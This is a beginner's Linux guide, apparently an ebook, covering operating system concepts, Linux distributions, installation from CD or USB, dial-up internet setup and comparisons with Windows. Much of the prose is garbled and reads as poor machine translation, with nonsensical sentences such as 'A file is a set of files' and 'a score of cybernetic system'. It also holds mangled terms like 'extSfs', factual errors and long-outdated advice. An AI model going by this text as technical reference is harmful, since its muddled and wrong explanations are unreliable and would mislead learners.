and luckily for you, Linux for Beginners is here to guide you through all of it.
Linux is an operating system, much like iOS and Windows. It can be used on
laptops, large computer centers, on cell phones, and even smart fridges. If it
can be programmed, Linux can almost definitely be installed, thanks to
several features and benefits. Linux is small, secure, supported on other
devices, and incredibly easy to customize. With Linux, you can create a setup
that is exactly what you want, with privacy, security, and access to plenty of
free to use software. This means that, once you develop the knowhow, you
can create a customized experience that will do exactly what you need,
allowing yourself to optimize the setup you have and ensure that the setup
you have
As you read through this book, you will be given a comprehensive guide to
everything you need to know as a beginner to Linux. You will learn about
why and how to determine which distribution of Linux is right for you. You
will discover how to use the terminal, how to set up exactly what you will
need on your system, and more.
When you are able to make your customized setup however you see fit, this
means that you can make sure that you are always working within the
constraints of the hardware that you are using. This means that older
machines, which may struggle under a load of many modern operating
systems such as Windows 10, can be optimized and used to their fullest
potential without wasting valuable resources or processing power on aspects
that are unnecessary, redundant, or even just detrimental to whatever it is that
you need to do.
Ultimately, you will be provided with exactly what you need to know to get
started with Linux, from start to finish. You will even be provided with
several alternatives to Windows-specific applications that can be downloaded
and used while running Linux on your device. Everything will be provided in
the simplest terms possible, so you get a complete and thorough
understanding of exactly what you need to know if you wish to get started
with Linux. Between receiving several step-by-step guides, questions, and
lists of commands, you should have much of what you need to know to at
least get started with the installation of your own distribution of Linux!
Enjoy the journey!
Chapter 1 Basic Operating System Concepts,
Purpose and Function
Purpose of the Operating System
Operating systems provide us with a score of cybernetic system, and
secondly, efficiency and reliability of its work. The first function is
characteristic of the OS as an extended machine, the second - the OS as a
distributor of hardware resources.
Operating System as an Extended Machine
Using the operating system, the application programmer (and through his
programs and the user) should have the impression that they are working with
an advanced machine. The hardware is not well adapted for direct use in
applications. For example, if you consider working with I / O devices at the
command level of the respective controllers, you can see that the set of such
commands is limited, and for many devices - primitive. The operating system
hides such a hardware interface but instead offers the programmer an
application programming interface that uses higher-level concepts (called
abstractions).
For example, when working with a disk, a typical abstraction is a file. it is
easier to work with files than directly with a disk controller (no need to
consider moving the drive heads, starting and stopping the motor, etc.), as a
result, the programmer can focus on the essence of his application. The
operating system is responsible for interacting with the disk controller.
Abstraction highlighting makes it easy for OS and application code to change
when migrating to new hardware. For example, if you install a new type of
disk device on your computer (provided that it is supported by the OS), all its
features will be taken into account at the OS level, and applications will
continue to use the files as before. This characteristic of the system is
called hardware independence. OS can be said to provide a hardware-
independent environment for executing applications.
Operating System as a Resource Allocator
The operating system must allocate resources efficiently. It acts as the
manager of these resources and provides them to applications on demand.
There are two main types of resource allocation. In the case of the spatial
distribution of resource access will be for multiple customers simultaneously,
and each one of them can use the resources (the shared memory). In the case
of temporal distribution, the system queues and, according to it, allows them
to use the entire resource for a limited time (so the processor is distributed in
single-processor systems).
When allocating resources, the OS resolves possible conflicts, prevents
unauthorized access of programs to those resources, on which they have no
rights, ensures the efficient operation of the computer system.
Classification of Modern Operating Systems
Consider the classification of modern operating systems, depending on their
scope. First of all, note the OS of large computers (mainframes). The main
characteristic of the hardware for which they are designed is the performance
of I / O: large computers provide a large number of peripherals (disks,
printers, terminals, etc.). Such a computer cybernetic system is used for the
reliable processing of large amounts of data. This OS should effectively
support this process (in batch mode or time allocation). An example of an OS
of this class would be IBM's OS /390.
The following category includes server operating systems. The main feature
of such operating systems is the ability to serve a large number of user
requests for shared resources. Network support plays an important role for
them. There are specialized server OSes that exclude elements that are not
related to the performance of their basic functions (for example, support for
user applications). Universal servers ( UNIX or Windows XP systems )
are now more commonly used to implement servers.
The most massive category is personal OS. Some operating systems in this
category, developed with the expectation of the user (Windows 95/98 / Me)
by Microsoft are simplified versions of the universal OS. Particular attention
in the personal OS is given to the support of the graphical user interface and
multimedia technologies.
There is also a real-time OS. In such a system, each operation must be
guaranteed to be performed within a specified time range. Real-time OS can
control the flight of a spaceship, process or video demonstration. There are
specialized real-time OSes such as QNX and VxWorks.
Another category is embedded OS. These include managing applications for
various microprocessor systems used in military technology, consumer
electronics systems, smart cards, and other devices. Such systems pose
special requirements: placing a small amount of memory and support for
specialized OS devices. Often, built-in OS is developed for a specific
device; universal systems include embedded Linux and Windows CE.
Functional Components of Operating Systems
An operating system can be considered as a set of components, each of which
is responsible for the implementation of a specific function of the
system. Consider the most important features of the modern OS and the
components that implement them.
The way the system is built from components and their relationship is
determined by the architecture of the operating system. Each operating
system is going to be a bit different in the kind of work that it can handle, and
its organizational structure, so learning this and how to put it all together can
be important.
Process and Flow Management
One of the most important functions of OS is to execute applications. Code
and application data is stored in the computer cybernetic system on disk in a
special executable manner. After the user decides to run either OS to perform
a file system creates the basic unit of a computer, called a process. You can
specify the following: a process is a program that executes it.
The operating system allocates resources between processes. These resources
include CPU time, memory, devices, disk space as files. For the allocation of
memory of each process, undertake its address space - set address memory,
which allows you access. The process space is stored in the address
space. The allocation of disk space for each process formed a list of open
files similarly.
The processes protect the resources they possess. For example, the process
address space cannot be accessed directly from other processes (it is secure),
and when working with files, a mode can be specified that denies access to
the file to all processes except the current one.
The allocation of processor time between processes is necessary because the
processor executes instructions one by one (ie, at a particular time, only one
process can physically execute on it), and for the user, the processes should
appear as sequences of instructions executed in parallel. To achieve this
effect, the OS provides the processor with each process for a short time, after
which it switches the processor to another process; in this case, the execution
of the processes resume from the place where they were interrupted. In
a multiprocessor system, processes can run in parallel on different processors.
Modern operating systems in addition to processes can support multitasking,
which provides in the process, the presence of several sequences of
instructions (threads), which run in parallel to the user, like most processes in
the OS. Unlike processes, threads do not provide resource protection (for
example, they share the address space of their process).
Memory Management
While executing the code, the processor takes instructions and data from the
computer's (main) memory. This memory is displayed as an array of bytes,
each of which has an address.
The main memory is a type of resource between processes. OS is responsible
for the allocation of memory. The address space is protected during the
process and released only after the execution process is completed. The
amount of memory available to the process can vary in the course of the
distribution of memory.
OS must be capable of programs, individually or in the aggregate amount
available for the main memory. To this end, virtual memory technology must
be realized. This technology allows placing in the main memory only those
instructions and processes that are needed at the current time, while the
contents of the rest of the address space are stored on disk.
I / O Management
The operating system is responsible for managing I / O devices connected to
the computer's memory. Support for such devices in the OS is usually
performed at two levels. The first lower level includes device drivers -
software modules that control devices of a particular type, taking into account
all their features. The second level includes a versatile I / O interface
convenient for use in applications.
The OS should implement a common I / O driver interface through which
they interact with other system components. This interface makes it easy to
add drivers for new devices. Modern OSes provide a large selection of ready-
made drivers for specific peripherals. The more devices the OS supports, the
more chance it has of practical use.
File Management and File Systems
For OS users and programmers, disk space is provided as a set
of files organized into a file system. A file is a set of files on a file system that
can be accessed by name. The term "file system" can be used for two
concepts: the principle of organizing data in the form of files and a specific
set of data (usually the corresponding part of the disk) organized in
accordance with this principle. As part of the OS, it can be implemented
simultaneously supported and ICA several file systems.
File systems are considered at the logical and physical levels. The logical
level defines the external representation of the system as a collection of files
(usually located in directories), as well as performing operations on files and
directories (creation, deletion, etc.). The physical layer defines the principles
of allocation of data structures of the file system on the drive.
Network Support
Network systems
Modern operating systems are adapted to work on the network, they are
called network operating systems. Networking support enables the OS to:
❖ To make local resources (disk space, printers, etc.) publicly available
over the network, ie to function as a server
❖ Refer to other computer resources through a network that is
functioning as a client
Implementing the functionality of server and client based
on vehicles responsible for the transmission of data between computers
according to the rules specified network protocols.
Distributed systems
Network OSes do not hide the presence of a network from the user. The
network support in them does not determine the structure of the system and
enriches it with additional capabilities. There are also distributed OSs that
allow pooling the resources of several computers in a distributed system. It
appears to the user as one computer with multiple processors working in
parallel. Distributed and multiprocessor systems are two major categories of
OS that use multiple processors.
Data security
Data security in the OS means ensuring the reliability of the system (data
protection against loss in case of failure) and protection of data against
unauthorized access (accidental or intentional). To protect against
unwarranted access, the OS should ensure the availability
of authentication of users (such means allow to determine whether the users
are actually who they say they are. This is usually used for system
passwords) and their authorization (to verify user rights which have been
authenticated to perform a specific operation).
User Interface
There are two types of user interaction means running: shell ( shell ) and a
graphical user interface ( GUI ). The command interpreter enables users to
interact with the OS using a special command language (online or through
startup) to execute batch files. Commands of this language force the OS to
perform certain actions (for example, run applications, work with files).
The graphical user interface allows it to interact with the OS by opening
windows and executing commands with menus or buttons. There are many
approaches to implementing a GUI: for example, in Windows systems, its
support systems are built into the system, and in UNIX, they are external to
the system and rely on standard I / O controls.
Conclusions
❖ An operating system is a level of software that lies between the levels
of applications and computer hardware. Its main purpose - to make use of
computer systems easier and improve efficiency.
❖ The main functional components of the OS include process
management, memory management, I / O management, file management and
file system support, network support, data protection, user interface
implementation.
Chapter 2 Basics of Linux
Linux provides a complete operating system with the lowest level of
hardware control and resource management of complete architecture. This
architecture follows the good tradition of UNIX for decades and is very
stable and powerful. In addition, since this excellent architecture can run on
the current PC (X86 system), many software developers have gradually
transferred their efforts to this architecture. So due to this reason the Linux
operating system also has a lot of applications.
Although Linux is only the core system and the tools being provided by the
core structure the integration of the core and the tools with the software
provided by the software developers makes Linux a more complete and
powerful operating system.
Why Linux Matters?
Now that we know what Linux is, let's talk about what Linux is currently
used for. Because the Linux kernel is so small and delicate, it can be executed
in many environments that emphasize power savings and lower hardware
resources. Because Linux distributions integrates a lot of great software
(whether proprietary or free), Linux is also quite suitable for the current use
of personal computers. Traditionally, the most common applications for
Linux can be roughly divided into enterprise applications and personal
applications, but the popularity of the cloud computing mechanism in recent
years seems to make Linux even more powerful. In the below section we
explain about the few Applications of Linux in real life.
Utilization of the Enterprise Environment
The goal of digitalization is to provide consumers or employees with
information about products (such as web pages) and to integrate data
uniformity across the enterprise (such as unified account management / File
Management Systems). In addition, some businesses, such as the financial
industry, emphasize key applications such as databases and security
enhancements have adopted Linux in their environments.
Web Server:
This is currently the most popular application for Linux. Inherited by the
UNIX high stability good tradition, Linux when used for the network
function is particularly stable and powerful. In addition to this because of the
GNU project and the GPL model of Linux, many excellent software is
developed on Linux, and these server software on Linux are almost free
software. Therefore, as a web Server protocols such as WWW, Mail
receiving Server, File transfer Server and so on, Linux is absolutely the best
choice. Of course, this is also the strength of Linux and is the main reason for
its popularity among programmers and network engineers. Due to the strong
demand for Linux server many hardware vendors have to specify the
supported Linux distributions when launching their products.
Mission critical applications (financial databases, Large Enterprise
Network Management Environment)
Due to the high performance and low price of personal computers, the
environment of finance and large enterprises in order to fine-tune their own
machines along with so many enterprises had gradually move to Intel-
compatible X86 host environment. In addition, the software that these
enterprises use is the software that uses UNIX operating system platform
mostly.
High performance computing tasks for academic institutions:
Academic institutions often need to develop their own software, so the
operating system as a development environment for the demand is very
urgent. For example, the Harvard University of Science and technology,
which has a very multi-skill system, needs this kind of environment to make
some graduation projects. Examples include fluid mechanics in engineering,
special effects in entertainment, working platforms for software developers,
and more. Linux has a lot of computing power due to its creator being a
computer performance freak, and Linux has a wide range of supported GCC
compilers, so the advantages of Linux in this area are obvious.
Why Linux is better than Windows for hackers?
1. Open source
Open source is the software whose content is open to the public. Some can be
even modified if you have skills and you can redistribute them with your own
features. Open source Software and operating systems help people to help
excel in their skillset. Being open source installation of Linux is free unlike
windows, which charges a lot of money.
2. Freedom
Hackers need freedom. Linux is free anyway. The content of the program is
open and you can freely go around. On the other hand, it is easy to break it,
but it's also fun. Freedom is great. You can make adjustments as you like, and
you are free to customize your own or your company requirements. And
every time it’s flexible. Whereas Windows restricts its users in many areas.
3. Used in servers
Not only that Linux is free but it is also lightweight and can work well when
combined with a server. Red hat the famous server software is a Linux
distribution. Many hosting companies and websites use Linux for their
servers and being a hacker who follows client server model to attack targets
Linux is very convenient and flexible.

4. Many types
The best thing about Linux is the number of choices you can make in the
form of distributions. Hackers can use distributions like Kali and Parrot
which are preinstalled with hacking tools to enhance their performance which
otherwise is a very tedious work to install every software in Windows.
5. Light
Linux Operating system is very light weight and will go through very less
lags and power shutdowns when compared to windows. As a hacker, we have
to do a lot of work in different terminals so a fast and light environment like
Linux is important for smooth performance.
6. Stable Operation
However, Linux actually works quite stably. Network functions and security
are well thought out, so you can have something strong. Being able to use it
at ease is also a feature of Linux. In fact, many corporate sites and web
services are running on Linux. Given these, you can see that it is a reliable
OS.
Chapter 3 What are Linux Distributions?
When you get Linux for your computer, you are essentially getting Linux
distribution. Just like other popular operating systems, you get an installation
program that consists of the kernel, a graphical user interface, a desktop, and
a bunch of applications that you can readily use once you installed Linux in
your computer. The added bonus is that you also get the opportunity to get
your hands on the source code for the kernel and the applications that you
get, which allows you to tweak them the way you want them to operate in the
future.
While you can add desktop environments, apps, and drivers that don’t come
with your distribution, you will need to find the distribution that will give you
the ideal setup that you have in mind. Doing so will save you the time that
you may need to spend on finding apps and other programs that will work
best with the Linux that you have installed, which can get in the way of
setting up the system just the way you want it.
What Comes with a Distro?

1. GNU software
Most of the tasks that you will be performing using Linux involve GNU
software. These are utilities that you can access using the text terminal, or the
interface that looks like a Windows command prompt where you enter
commands. Some of the GNU software that you will be using are the
command interpreter (also known as the bash shell) and the GNOME GUI.
If you are a developer, you will be able to make changes to the kernel or
create your own software for Linux using a C++ compiler (this already comes
with the GNU software that comes with your Linux distro) and the Gnu C.
You will also be using GNU software if you edit codes or textfiles using the
emacs or the ed editor.
Here are some of the most popular GNU software packages that you may
encounter as you explore Linux utilities:

2. Applications and GUIs


Since you will not want to type string after string of commands on a
command terminal just for your computer to do something, you will want to
navigate and use programs in your computer using a GUI or a graphical user
interface. A GUI enables you to click on icons and pull up windows that will
help you use a program easier.
Most of the distros use the K Desktop Environment (KDE), or the GNU
Object Model Environment (GNOME). If you have both environments
installed on your computer, you can choose which desktop will serve as the
default, or you can switch between them from time to time. Both these
desktops have a similar feel to Mac OS and Windows desktops. It is also
worth taking note that GNOME comes with a graphical shell called Nautilus,
which makes the Linux configuration, file search, and application loading
easier. Should you need to use a command prompt, all you need to do is to
click on the terminal window’s icon on both desktop environments.
Apart from GUIs, any average computer user will also need to to use
applications, or programs that you can use to perform basic computing needs.
While you may not have access to the more popular programs that you may
have used in a Mac or Windows computer, Linux can provide open-source
alternatives that you can try out. For example, instead of having to buy
Adobe Photoshop, you can try out the GIMP, which is a program that works
just as great when it comes to working with images.
Linux also offers productivity software packages which fulfills the bulk of an
ordinary computer user’s needs. You can get office productivity apps that
will allow you to do word processing, create database, or make
spreadsheets from Libreoffice.org or OpenOffice.org.
Tip: If you want to install MS applications to Linux (e.g., Microsoft office),
you can use CrossOver Office.

3. Networks
Linux allows you to find everything that you need by using a network and
exchange information with another computer. Linux allows you to do this by
allowing you to use TCP/IP (Transmission Control Protocol/Internet
Protocol), which allows you to surf the web and communicate with any
server or computer out there.

4. Internet servers
Linux supports Internet services, such as the following:
Email
News services
File transfer utilities
World wide web
Remote login
Any Linux distro can offer these services, as long as there is Internet
connection, and that the computer is configured to have Internet servers, a
special server software that allows a Linux computer to send information to
another computer. Here are common servers that you will encounter in
Linux:

in.telnetd – allows you to log in to a different system wia the


internet, with the aid of a protocol called TELNET
sendmail – serves as a mail server which allows exchange of
emails between two systems using the Simple Mail Transfer
Protocol (SMTP)
innd – allows you to view news using the Network News
Transfer Protocol (NNTP), which enables you to access a news
server in a store-and-forward way.
Apache httpd – allows you to send documents to another
system using the HyperText Transfer Protocol (HTTP).
vsftpd – allows you to send a file to another computer using the
filetransfer protocol (FTP)
sshd – allows you to log-in to a computer securely using the
internet, using the Secure Shell (SSH) protocol

5. Software Development
Linux is a developer’s operating system, which means that it is an
environment that is fit for developing software. Right out of the box, this
operating system is rich with tools for software developments, such as
libraries of codes for program building and a compiler. If you have
background in the C language and Unix, Linux should feel like home to you.
Linux offers you the basic tools that you may have experienced using on a
Unix workstation, such as Sun Microsystems, HP (Hewlett-Packard), and
IBM.

6. Online documentation
After some time, you will want to look up more information about Linux
without having to pull up this book. Fortunately, Linux has enough
information published online that can help you in situations such as recalling
a syntax for a command. To pull this information up quickly, all you need to
do us to type in “man” in the command line to get the manual page for Linux
commands. You can also get help from your desktop and use either the help
option or icon.
Things to Consider When Choosing Distros
What is the best Linux distro (short for distribution) is for you? Here are
some things that you may want to keep in mind:

Package managers
One of the major factors that separate distros from one another is the package
manager that they come with. Just like what you may expect, there are distros
that come with features that allow them to be easier to use from the command
line while you are installing the features that come with them.
Another thing that you need to consider apart from the ease of use is the
package availability that comes with distros. For example, there are certain
distros that are not as popular as the others, which means that there are less
apps out there that are developed to be used with certain distributions. If you
are starting out on Linux, it may be a good idea to install a distro that does
not only promise easy navigation from the get-go, but also a wide range of
apps that you may want to install in the future.

Desktop environment
You will want to have a distro that allows you to enjoy a desktop that works
well with your computing needs – you will definitely want a desktop that has
great customization options, and easy to find windows and menus. You will
also want to ensure that your desktop have efficient resource usage, as well as
great integration with the apps that you plan to use.
While it is possible for you to place another desktop environment in the
future, you will still want the desktop that comes with your distro to resemble
the desktop that you really want to have. This way, you will not have to
spend too much effort trying to setup every app that you want to have quick
access to and ensure that all your applications are able to work well as they
run together.

Hardware Compatibility
Different distros contain different drivers in the installation package that they
come from, which means that there is a recommended set of hardware for
them to work seamlessly. Of course, you can check out other sources of
drivers that will work best with your existing hardware, but that only creates
more work when it comes to getting everything running right away from
installation. To prevent this trouble, check the distro’s compatibility page and
see whether all your computer peripherals work fine with your Linux
distribution out of the box.

Stability and Being Cutting Edge


Different distributions put different priorities on stability and updates to get
the latest version of applications and packages. For example, the distro
Debian tends to delay getting some application updates to make sure that
your operating system remains stable. This may not be suitable for certain
users that prefer to always get the latest version of applications and get the
latest features.
Fedora, on the other hand, performs quite the opposite – it is focused on
getting all your programs and features up to date and ensures that you always
have the greatest and the latest wares for your Linux. However, this may
happen at the expense of stability of the app, which may prompt you to roll
back to the previous version.

Community Support
Linux is all about the community that continuously provides support to this
operating system, from documentation to troubleshooting. This means that
you are likely to get the resources that you need when it comes to managing a
particular distribution if it has a large community.

Great Distros to Try


Now that you know what makes a Linux distribution great and you are about
to shop for the distro that you are going to install, you may want to check
these distributions that may just work well for you:

1. Ubuntu
Ubuntu is largely designed to make Linux easy to use for an average
computer user, which makes it a good distribution for every beginner. This
distro is simple, updates every six months, and has a Unity interface, which
allows you to use features such as a dock, a store-like interface for the
package manager, and a dashboard that allows you to easily find anything on
the OS. Moreover, it also comes with a standard set of applications that
works well with most users, such as a torrent downloader, a Firefox web
browser, and an app for instant messaging. You can also expect great support
from its large community.

2. Linux Mint
This distro is based on Ubuntu but is designed to make things even easier for
any user that has not used Linux in the past – it features familiar menus and is
not limited to just making you use open source programs. This means that
you can get programs that are standard in popular operating systems such as
.mp3 support and Adobe Flash, as well as a number of proprietary drivers.

3. Debian
If you want to be cautious and you want to see to it that you are running a
bug-free and stable computer at all times, then this is probably the distro for
you. Its main thrust is to make Linux a completely reliable system, but this
can have some drawbacks –Debian does not prioritize getting the latest
updates for applications that you have, which means that you may have to
manually search for the latest release of most software that you own. The
upside is that you can run Debian on numerous processor architectures, and it
is very likely to run on old builds.
However, this does not mean that going with Debian is having to remain
outdated – it has a lot of programs available online and in Linux repositories.

4. OpenSUSE
OpenSUSE is a great distro that you may consider trying out because it
allows you to configure your OS without having the need to deal with the
command line. It usually comes with the default desktop KDE, but will also
let you select between LXDE, KDE, XFCE, and GNOME as you install the
distro package. It also provides you good documentation, the YaST package
manager, and great support from the community.
One of the drawbacks that you may have when using this distro is that it can
consume a lot of resources, which means that it is not ideal to use on older
processor models and netbooks.

5. Arch Linux
Arch Linux is the distro for those that want to build their operating system
from scratch. All that you are going to get from the installation package from
the start is the command line, which you will use to get applications, desktop
environment, drivers, and so on. This means that you can aim to be as
minimal or as heavy in features, depending on what your needs are.
If you want to be completely aware of what is inside your operating system,
then Arch Linux is probably the best distro for you to start with. You will be
forced to deal with any possible errors that you may get, which can be a great
way to learn about operating Linux.
Another thing that makes this distro special is that it uses Pacman, which is
known to be a powerful package manager. Pacman comes in a rolling release,
which means that you are bound to install the latest version of every package
that is included – this ensures that you are bound to get cutting edge
applications and features for your Linux. Apart from this package manager,
you also get to enjoy the AUR (Arch User Repository), which allows you to
create installable version of available programs. This means that if you want
a program that is not available in Arch repositories, you can use the AUR
helper to install applications and other features like normal packages.
Chapter 4 Setting up a Linux System
As for the preparation of disk space, this is the most crucial moment in the
whole process of installing Linux. The fact is that if you install the system on
a computer whose hard disk already has any data, then it is here that you
should be careful not to accidentally lose it. If you install a Linux system on a
“clean” computer or at least on a new hard disk, where there is no data, then
everything is much simpler.
Why can’t you install Linux in the same partition where you already have, for
example, Windows, even with enough free space?
The fact is that Windows uses the FAT32 file system (in old versions –
FAT16) or NTFS (in Windows NT / 2000), and in Linux, a completely
different system called Extended File System 2 (ext2fs, in the newest
versions – journaling extSfs). These file systems can be located only on
different partitions of the hard disk.
Note that in Linux, physical hard disks are referred to as the first is hda, the
second is hdb, the third is hdc, and so on (hdd, hde, hdf...).
Sometimes in the installation program of the system you can see the full
names of the disks - / dev / hda instead of hda, / dev / hdb instead of hdb, and
so on – this is the same thing for us now. The logical partitions of each disk
are numbered. So, on a hda physical disk, there are hda1, hda2, and so on,
hdb can be hdb1, hdb2, and so on. Do not be confused by the fact that these
figures sometimes go in a row. It does not matter to us.

How to start installing Linux from disk


To begin installing Linux, insert the system CD into the drive and restart the
computer by selecting the boot from CD. If you plan to install Linux over
Windows, then the installation program can be run directly from it.
Moreover, if you are running Windows 95/98, the installation will start
immediately, and if the installation program was launched from under a more
powerful system, for example, Windows 2000, XP, Vista, Seven will still
have to restart the computer from the CD disk.
Your computer may already be configured to boot from a CD. If the boot
from the CD does not occur, when you restart your computer, enter the BIOS
settings. On most systems, to do this, immediately after turning on the
computer or restarting, press the Delete key or F11.
After that, find the Advanced BIOS Settings section. Sometimes the section
name may be different, but in any case, it is very similar to that in this book.
Enter it by first moving the pointer to it using the cursor keys and then
pressing the Enter key. Now find in the parameters either the item Boot
Sequence (boot order), or, if not, the item 1st boot device (first boot device).
Use the cursor keys to select the desired item and, by changing its value using
the Page Up and Page Down keys, make the first bootable CD-ROM device.
Press the Esc key to exit the section, and then F10 to exit the BIOS with the
saved settings. Most likely, the computer will ask you to confirm this
intention. Usually, to confirm, you must press the Y key, which means yes.
All modern computers can boot from a CD. If for some reason your computer
does not have this capability, you will have to create a boot diskette to install
Linux. There are always special tools for this on the Linux distribution CD.
Usually, they are located in a folder called dos tools (or in a folder with a
similar name). There are images of boot floppies and a DOS program for
creating them. Read the README files on the distribution CD for more
detailed instructions.
The installation of the Linux operating system can be divided into several
stages:

disk space preparation;


selection of the programs (packages) you need;
device configuration and graphical interface;
install bootloader.
The installation program takes control of the entire process. You should only
answer questions if the installation does not occur in fully automatic mode.

How to make a bootable USB flash drive for Linux

Today, the operating system is becoming increasingly popular. Surely you


have already heard from your friends or acquaintances stories about how easy
it is to carry out such an installation. Obviously, creating a bootable USB
flash drive for Linux is a great way to reinstall the operating system on a
computer with a damaged or missing drive, laptop, or netbook. Let's get
acquainted with this installation method better!
First, you need to find and download a Linux operating system image.
Finding images of different versions of Linux on the Internet is very simple
because it is “freeware” and is distributed absolutely free. Download the
desired image on our website, official website or torrents.
A bootable Linux flash drive requires a regular flash drive. Its volume should
be 1GB and higher.
Next you need to download the program Unetbootin.
This program will help us with how to make a bootable Linux flash drive.
You can download it from the page unetbootin.sourceforge.net. At the top of
the site there are buttons for 3 distributions – Windows, Linux and Mac OS.
If you, for example, now have Windows, then press the Windows button.
After downloading, the program opens instantly, and you do not need to
install it. If you have problems with the launch (Windows 7), run "on behalf
of the administrator."
Initially, the program is ticked on the “Distribution”, but we need to put it on
the “Disk Image”. We also indicate that this is an ISO image. Next, click on
the button "..." and select the image that we previously downloaded from the
Internet.
If your flash drive is capacious enough, then it is advisable to allocate space
in the file storage space. 100 MB will be enough.
And at the very bottom of the program window, select which flash drive you
want to burn. Example – “Type: USB drive; Media: E: \ ". If only one flash
drive is inserted into the computer, the program will determine it on its own
and there is no need to choose anything.
It remains only to press the "OK" button and wait until the program
completes the burning of the image. It takes 5-10 minutes.
That is all you need to know about how to burn Linux to a USB flash drive.
After burning, you must restart the computer or insert the USB flash drive
into the computer where you want to install the Linux Operating System.
How to choose programs to install
So, the most crucial moment – the layout of the hard drive – is behind. Now
the installation program proceeds to the next stage, in which it will offer to
select the necessary programs (packages are traditionally called programs in
Linux, which, by the way, is truer in terms of terminology).
You can simply choose one of the options for installing packages (for home
computer, office, workstation with a connection to a local network, etc.).
Alternatively, by turning on the Package selection switch manually, go to the
software package selection window.
All programs included in the distribution of Linux are divided in this window
into several sections: system, graphic, text, publishing, sound, games,
documentation, and so on. In each section, you can select (or, conversely,
deselect) any software package. If it is not clear from the name of the
program what it is for, click on the name, and a brief description of the
purpose of this program will appear in a special window. Unfortunately, in
Russian-language distributions, often not all descriptions are translated into
Russian, so some descriptions may be in English.
Having chosen the necessary packages for installation, be sure to locate on
the screen and check the box to check dependencies. The fact is that some
programs may depend on others, that is, they may use modules of other
programs in their work.
Some programs may require the presence of any other software packages for
normal operation. In this case, they say that one program depends on another.
For example, the kreatecd CD burning program contains only a graphical
user interface and calls the cdrecord console program for the actual recording,
although the user doesn’t see it when working.
This means that the kreatecd program depends on cdrecord. When installing
Linux, all software dependencies are checked automatically; you just need to
allow the installation program to do this by turning on the appropriate switch.
The checkbox for checking dependencies is needed for the installer to
automatically check if some of the selected programs are using those
packages that are not selected for installation. Having made such a check, the
installation program will provide you with a list of these packages and will
offer to install them as well. We should agree with this, otherwise, some
programs will not work.

Configure devices and graphical interface


After you agree to install the necessary packages, the process of copying the
necessary files to the hard disk will begin. This process is quite long, so you
can go and drink coffee at this time, for at least five to ten minutes. However,
if your distribution is recorded on two or more compact discs, the installer
will from time to time ask you to insert the necessary compact disc into the
drive.
Then the configuration of additional devices and the graphical interface will
begin. There is one subtlety. The fact is that most installation programs for
some reason incorrectly process information about the mouse. Therefore, the
question of what kind of mouse you have at this stage is to answer a simple
two-button or a simple three-button. Do not look in the list of the
manufacturer, model, and so on.
After installing the system, it will be possible to separately enable additional
functions of the mouse (for example, the operation of the scroll wheel) if they
do not work themselves.
Install the bootloader
After all the above operations, the freshly installed system is ready for
operation. However, the installer will ask you to answer one more question:
should the boot loader be installed and, in most cases, if necessary, which
one?
If Linux is the only operating system on your computer, then you will not
need a bootloader. In this case, simply restart the computer, removing the
bootable CD from it.
If you specifically changed the BIOS settings in order to allow the computer
to boot from a CD or from a floppy disk, then now, after installing the
system, you can reconfigure the computer to boot only from the hard disk. To
do this, go back to the BIOS settings and change the boot order. However, if
you specified the “universal” boot order – Floppy, CDROM, IDEO – you can
no longer change it, just make sure that when you turn on and restart your
computer, no boot diskettes or a CD are inserted in it, unless necessary boot
from these devices.
Connecting to the Internet with Linux
Connection to the Internet is carried out using a physical channel between
your computer and the provider's server.
There are three main methods for organizing a physical connection:

wireless network;
the local network;
A modem through which PPP is exchanged.
In the first case, a wireless access point is required. Only if available is it
possible to set up a wireless network with the Internet.
The second method is used when your computer is connected to a local
network, in which there is a server for access to the world wide web. In this
case, you do not need to put your efforts into the organization of the
connection – the local network administrator will do all that is necessary for
you. Just launch a browser, enter the URL you are interested in, and access it.
And the third way is a dial-up modem connection. In this case, the
administrator will not help you, so you have to do everything yourself. For
these reasons, we decided to consider this method in more detail.
First, naturally, you should have a modem and a telephone. Next, you need to
decide on the provider that provides access to the Internet and get from it the
phone number by which your PC will connect to the modem pool of the
provider and, of course, your username and password to access the global
network.
Next, you need to configure the PPP protocol. This can be done manually, or
you can use the configuration program. Manual configuration is quite
complicated and requires editing files and writing scripts. Therefore, it is
preferable for beginners to work with a special program that automates the
entire process of setting up access to the Internet.

This program is called kppp and is originally included in the KDE graphical
environment. This utility makes it much easier to set up a connection and, in
most cases, requires you to only correctly specify accounting information.
Chapter 5 Comparison between Linux and other
Operating Systems
Even though Linux operating system can co-exist easily with other operating
systems on the same machine, but there is still the difference between it and
other operating systems such as Windows OS/2, Windows 95/98, Windows
NT, and other implementations of UNІX for the personal computer. We can
compare and contrast the Linux and the other operating system with the
following points.
Linux is a Version of UNІX
Window NT and Windows OS/2 can be said to be a multitasking operating
system just like Linux. Looking technically at them, both Windows NT and
Windows OS/2 are very similar in features like in networking, having the
same user interface, security, etc. But there is not a version of UNІX like
Linux that is a version of UNІX. So, the difference here is that Linux is a
version of UNІX, and as such, enjoys the benefits from the contributions of
the UNІX community at large.
Full use of X86 PROCESSOR
It is a known fact that Windows, such as Windows 95/96, cannot fully utilize
the functionality of the X86 processor, but Linux operating system can
entirely run in this processor’s protected mode and explore all the features
therein which also includes the multiple processors.
Linux OS is free
Other operating systems are commercial operating systems, though Windows
is a little inexpensive. Some of the cost of this other operating system is high
for most personal computer users. Some retail operating systems cost as high
as $1000 or more compared to free Linux. The Linux software is free
because, when one can access the internet or another computer, a network can
be downloaded free to be installed. Another good option is that the Linux OS
can be copied from a friend system that already has the software.
Runs complete UNІX system
Unlike another operating system, one can run an entire UNІX system with
Linux at home without incurring the high cost of other UNIX
implementations for one’s computer. Again, some tools will enable Linux to
interact with Windows, so it becomes effortless to access Windows files from
Linux.
Linux OS still does much than Windows NT
Though more advanced operating systems are always on the rise in the world
of personal computers like the Microsoft Windows NT that is trending now,
because of its server, computing can’t benefit from the contributions of the
UNІX community, unlike the Linux OS. Again, Windows NT is a proprietary
system. The interface and design are owned and controlled by one
corporation which is Microsoft, so it is only that corporation or Microsoft that
may implement the design, so there might not a free version of it for a very
long time.
Linux OS is more stable
Linux and other operating systems such as Windows NT are battling for a fair
share of the server computing market. The Windows NT only has the full
support of the Microsoft marketing machine, but the Linux operating system
has the help of a community which comprised of thousands of developers
which are aiding the advancement of Linux through the open-source model.
So, looking at this comparison, it shows that each operating system has its
weak and robust point, but Linux is more outstanding than another operating
system because other operating systems can crash easily and very often
especially the Windows NT, while Linux machines are more stable and can
run continuously for an extended period.
Linux as better networking performance than others
Linux OS can be said to be notably better when it comes to networking
performance, though Linux might also be smaller than Windows NT. It has a
better price-performance ratio and can compete favorably with another
operating system because of its effective open-source development process.
